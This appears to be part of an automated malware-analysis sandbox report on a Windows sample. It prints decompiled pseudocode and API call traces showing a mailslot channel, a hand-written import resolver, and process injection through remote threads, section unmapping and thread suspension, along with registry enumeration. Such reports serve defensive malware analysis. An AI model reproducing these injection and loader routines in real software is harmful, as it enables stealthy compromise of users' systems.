					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
  • Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
  • Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
  • Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
  • FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
